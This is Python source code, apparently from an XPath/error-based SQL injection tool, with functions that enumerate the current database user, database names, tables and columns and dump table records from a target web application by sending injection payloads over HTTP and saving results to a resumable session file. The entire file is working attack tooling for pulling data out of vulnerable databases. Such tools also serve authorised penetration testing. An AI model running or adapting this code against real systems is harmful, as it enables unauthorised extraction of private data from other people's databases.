def _extract_search_results(self, payloads, database="", table="", search_type="", records=None, position=0): _temp, index = [], 0 pos = position + 1 resumed = bool(records) Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] if records: entry = records.pop() database = entry.database table = entry.table try: if search_type == "database": response = self._search_db(payload=payload, index=pos) _temp.append(response) if search_type == "table": response = self._search_table(payload=payload, index=pos, database=database) _temp.append(response) if search_type == "column": response = self._search_column(payload=payload, index=pos, database=database, table=table) _temp.append(response) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break index += 1 pos += 1 if resumed: database = "" table = "" if _temp: resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=False, result=_temp) return resp
def user(self): payloads = self._generat_payload(payloads_list=PAYLOADS_CURRENT_USER) logger.info("fetching current user") retval = self._extact(payloads=payloads) if retval.is_injected: logger.info("retrieved: '%s'" % (retval.result)) logger.success(f"current user: '******'") else: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return retval
def _extract_tbls(self, payloads, database=""): _temp, index = [], 0 Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload(url=url, regex=regex, data=data, headers=headers, proxy=self._proxy) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break else: if response.ok: result = response.result logger.info("retrieved: '%s'" % (result)) _temp.append(result) retval = session.dump( session_filepath=self.session_filepath, query=TBLS_STATEMENT.format(tbl_name=database, tblname=result), ) index += 1 if _temp and len(_temp) > 0: _temp = list(set(_temp)) resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=True, result=_temp) return resp
def search_regex( pattern, string, default=NO_DEFAULT, fatal=True, flags=0, group=None, ): """ Perform a regex search on the given string, using a single or a list of patterns returning the first matching group. In case of failure return a default value or raise a WARNING or a RegexNotFoundError, depending on fatal, specifying the field name. """ if isinstance(pattern, str): mobj = re.search(pattern, string, flags) else: for p in pattern: mobj = re.search(p, string, flags) if mobj: break if mobj: if group is None: # return the first matching group value = next(g for g in mobj.groups() if g is not None) else: value = mobj.group(group) value = re.sub(r"^\(+", "", value) if not value: value = "<blank_value>" value = value_cleanup(value) return value elif default is not NO_DEFAULT: return default elif fatal: logger.warning("unable to filter out values..") else: logger.warning("unable to filter out values..")
def search(self, db="", tbl="", col="", search_type=""): index = 0 _temp = [] is_resumed = False fetched_data = {} SearchResponse = collections.namedtuple( "SearchResponse", ["fetched", "count", "results"], ) if self._dbms and self._dbms == "PostgreSQL": logger.warning(f"Search is not implemeted yet for PostgreSQL..") return SearchResponse(fetched=False, count=0, results=[]) payloads = self._search_payloads(db=db, tbl=tbl, col=col, search_type=search_type) self._table_search = payloads.table_to_generate try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=self._table_search, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass remainder = 0 retval = self._extact(payloads=payloads.for_count) if retval.is_injected: found_records = int(retval.result) logger.info("used SQL query returns %d entries" % (found_records)) if found_records == 0: if search_type == "database": logger.warning(f"no databases LIKE '{db}' found") if search_type == "table": if not db: logger.warning( f"no databases have tables LIKE '{tbl}'") if db: logger.warning( f"no tables LIKE '{tbl}' in database '{db}'") logger.warning( f"no databases contain any of the provided tables") if search_type == "column": if not tbl and not db: logger.warning( f"no databases have tables containing columns LIKE '{col}'" ) if not tbl and db: logger.warning( f"no tables contain columns LIKE '{tbl}' in database '{db}'" ) if not db and tbl: logger.warning( f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'" ) if db and tbl: logger.warning( f"unable to retrieve column names for table '{tbl}' in database '{db}'" ) logger.warning( f"no databases have tables containing any of the provided columns" ) return SearchResponse(fetched=False, count=0, results=[]) if is_resumed: for entry in fetched_data: index = entry.get("index") name = entry.get("value") _type = entry.get("search_type") _temp.append(name) logger.info(f"resumed: {name}") if search_type == "column": remainder_value = 3 if search_type == "table": remainder_value = 2 if search_type == "database": remainder_value = 1 remainder = len(fetched_data) % remainder_value fetched_records = _temp _temp = self._format_results(_temp, remainder_value) if remainder > 0: index -= 1 fetched_records = fetched_records[-remainder:] _temp.pop() if remainder > 0: records = self._format_results(fetched_records, remainder_value) else: records = [] should_fetch = True if is_resumed: if index == found_records: should_fetch = False if should_fetch: retval = self._extact(payloads=payloads.for_dump) if retval.is_injected: payload = retval.payload payloads = self._generate_search_dump_payloads( count=found_records, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=TBL_SEARCH.format(name=self._table_search), ) response_data = self._extract_search_results( payloads=payloads, database=db, table=tbl, search_type=search_type, records=records, position=index, ) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_search_results(search_type, _temp) return SearchResponse(fetched=True, count=found_records, results=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return SearchResponse(fetched=False, count=0, results=[])
def tbl_names(self, db=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] TablesResponse = collections.namedtuple( "TablesResponse", ["fetched", "count", "database", "tables"]) if db: dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()] encode_string = to_hex(db, dbms=self._dbms) if self._dbms: dump_payloads = PAYLOADS_TBLS_NAMES.get( self._dbms, dump_payloads) for entry in dump_payloads: if self._dbms and self._dbms.startswith("Microsoft"): if "sysobjects" in entry: data = entry.format(db=db.strip(), db1=db.strip()) else: data = entry.format(db=encode_string, db1=encode_string) else: data = entry.format(db=encode_string) _temp_payloads.append(data) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=db, cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching tables for database: '%s'" % (db)) retval = self._tbl_count(db=db) if retval.is_injected: tbl_count = int(retval.result) if tbl_count != 0: logger.info("used SQL query returns %d entries" % (tbl_count)) if tbl_count == 0: logger.warning( "used SQL query returns %d entries for database: '%s'" % (tbl_count, db)) return TablesResponse(fetched=False, count=tbl_count, database=db, tables=[]) if is_resumed: for entry in fetched_data: name = entry.get("tblname") if name not in _temp: _temp.append(name) logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == tbl_count: should_fetch = False if should_fetch: payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_tbl_payloads(tbl_count=tbl_count, payload=payload, index=index) if not is_resumed: session.generate_table( session_filepath=self.session_filepath, query=DB_TABLES.format(name=db, tbl_name=db), ) response_data = self._extract_tbls(payloads=payloads, database=db) if response_data.is_fetched: _temp.extend(response_data.result) self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._pprint_tables( cursor_or_list=_temp, field_names="Tables", database=db, ) return TablesResponse(fetched=True, count=tbl_count, database=db, tables=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def dbs_names(self): is_resumed = False index = 0 fetched_data = {} _temp = [] DatabasesResponse = collections.namedtuple( "DatabasesResponse", ["fetched", "count", "databases"]) try: fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name="tbl_databases", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info("fetching database names") retval = self._dbs_count if retval.is_injected: dbs_count = int(retval.result) if dbs_count != 0: logger.info("used SQL query returns %d entries" % (dbs_count)) if dbs_count == 0: logger.warning( "used SQL query returns %d entries for database names.." % (dbs_count)) return DatabasesResponse(fetched=False, count=dbs_count, databases=[]) if is_resumed: for entry in fetched_data: name = entry.get("dbname") if name not in _temp: _temp.append(name) # logger.info(f"resumed: '{name}'") index += 1 should_fetch = True if is_resumed: if len(fetched_data) == dbs_count: should_fetch = False if should_fetch: payloads = self._generat_payload( payloads_list=PAYLOADS_DBS_NAMES) retval = self._extact(payloads=payloads) if retval.is_injected: payload = retval.payload payloads = self._generate_dbs_payloads(dbs_count=dbs_count, payload=payload, index=index) response_data = self._extract_dbs(payloads=payloads) if response_data.is_fetched: _temp.extend(response_data.result) self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: self._available_dbs(dbs_count, _temp) return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return DatabasesResponse(fetched=False, count=0, databases=_temp)
def data_dump(self, db="", tbl="", cols=""): index = 0 _temp = [] is_resumed = False fetched_data = {} _temp_payloads = [] fetched_records = [] cols = self._clean_up_cols(cols) count = "{0:03d}".format(len(cols)) RecordsResponse = collections.namedtuple( "RecordsResponse", ["fetched", "count", "database", "table", "columns", "records"], ) if db and tbl and cols and isinstance(cols, list): dump_payloads = [] [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()] test_column = "0x72306f746833783439" if self._dbms: dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads) test_column = "1337" for i in dump_payloads: data = i.format(col=test_column, db=db, tbl=tbl) _temp_payloads.append(data) try: tmp_table_name = f"{count}_{tbl.strip()}_tmp" fetched_data = session.fetch_from_table( session_filepath=self.session_filepath, table_name=tmp_table_name, group_by_columns="`index`,`column_name`,`column_value`", cursor=False, ) if fetched_data: is_resumed = True except Exception as error: pass logger.info( "fetching column(s) '%s' for table '%s' in database: '%s'" % (", ".join(cols), tbl, db)) last_seen = 0 remainder = 0 retval = self._data_count(db=db, tbl=tbl) if retval.is_injected: data_count = int(retval.result) if data_count != 0: logger.info("used SQL query returns %d entries" % (data_count)) if data_count == 0: logger.warning( "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'" % (data_count, ", ".join(cols), tbl, db)) return RecordsResponse( fetched=False, count=data_count, database=db, table=tbl, columns=cols, records=[], ) if is_resumed: _temp = fetched_data for entry in fetched_data: last_seen = index = entry.get("index") value = entry.get("column_value") # logger.info(f"resumed: '{value}'") fetched_records.append(value) remainder = len(fetched_data) % len(cols) if remainder > 0: index -= 1 last_seen = last_seen - 1 fetched_records = fetched_records[-remainder:] should_fetch = True if is_resumed: if index == data_count: should_fetch = False if should_fetch: # logger.info(f"resumed fetching from '{index+1}' record..") payloads = self._generat_payload(payloads_list=_temp_payloads) retval = self._extact(payloads=payloads) if retval.is_injected: payload = clean_up_payload(payload=retval.payload, replace_with="{col}") payloads = self._generate_data_payloads( data_count=data_count, payload=payload, cols=cols, index=index) if is_resumed and remainder > 0: remaing_records = payloads[last_seen][remainder:] payloads.update({last_seen: remaing_records}) if not is_resumed: self.__generate_records_tables(tbl=tbl, cols=cols, count=count) response_data = self._extract_data( payloads=payloads, table=tbl, columns=cols, fetched_records=fetched_records, count=count, ) if response_data.is_fetched: _temp.extend(response_data.result) table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}" ) else: message = f"tested with '{count}' queries, unable to find working SQL query." logger.critical(message) else: table_name = f"{count}_{tbl}_data" self._pprint_records( field_names=", ".join(cols), database=db, table_name=table_name, table=tbl, columns=cols, ) return RecordsResponse( fetched=True, count=data_count, database=db, table=tbl, columns=cols, records=_temp, ) if not retval.is_injected: status_code = retval.status_code error = retval.error count = retval.payloads_count if status_code not in [200, 0]: message = f"{error} - {count} times" logger.warning( f"HTTP error codes detected during run:\n{message}") else: message = ( f"tested with '{count}' queries, unable to find working SQL query." ) logger.critical(message) return RecordsResponse( fetched=False, count=0, database=None, table=None, columns=None, records=None, )
def _extract_data(self, payloads, table=None, columns=None, fetched_records=None, count=None): _temp, is_interrupted = [], False Response = collections.namedtuple("Response", ["is_fetched", "result"]) for index, values in payloads.items(): __temp = [] if not fetched_records else fetched_records position = 0 while position < len(values): p = values[position] name = p.get("column") payload = p.get("payload") payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload( url=url, regex=regex, data=data, headers=headers, proxy=self._proxy, ) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) is_interrupted = True break else: if response.ok: result = response.result logger.info( "retrieved: '%s'" % (result if result != "<blank_value>" else "")) _temp.append({ "index": index + 1, "column_name": name, "column_value": result, }) __temp.append(result) table_name = f"{count}_{table}_tmp" PREPARED_STATEMENT = f"INSERT INTO `{table_name}` (`index`, `column_name`, `column_value`) VALUES (?, ?, ?);" retval = session.dump( session_filepath=self.session_filepath, query=PREPARED_STATEMENT, values=(index + 1, name, result), ) position += 1 _ = self._save_records(table=table, column_names=columns, records=__temp, count=count) if is_interrupted: break if _temp and len(_temp) > 0: resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=False, result=_temp) return resp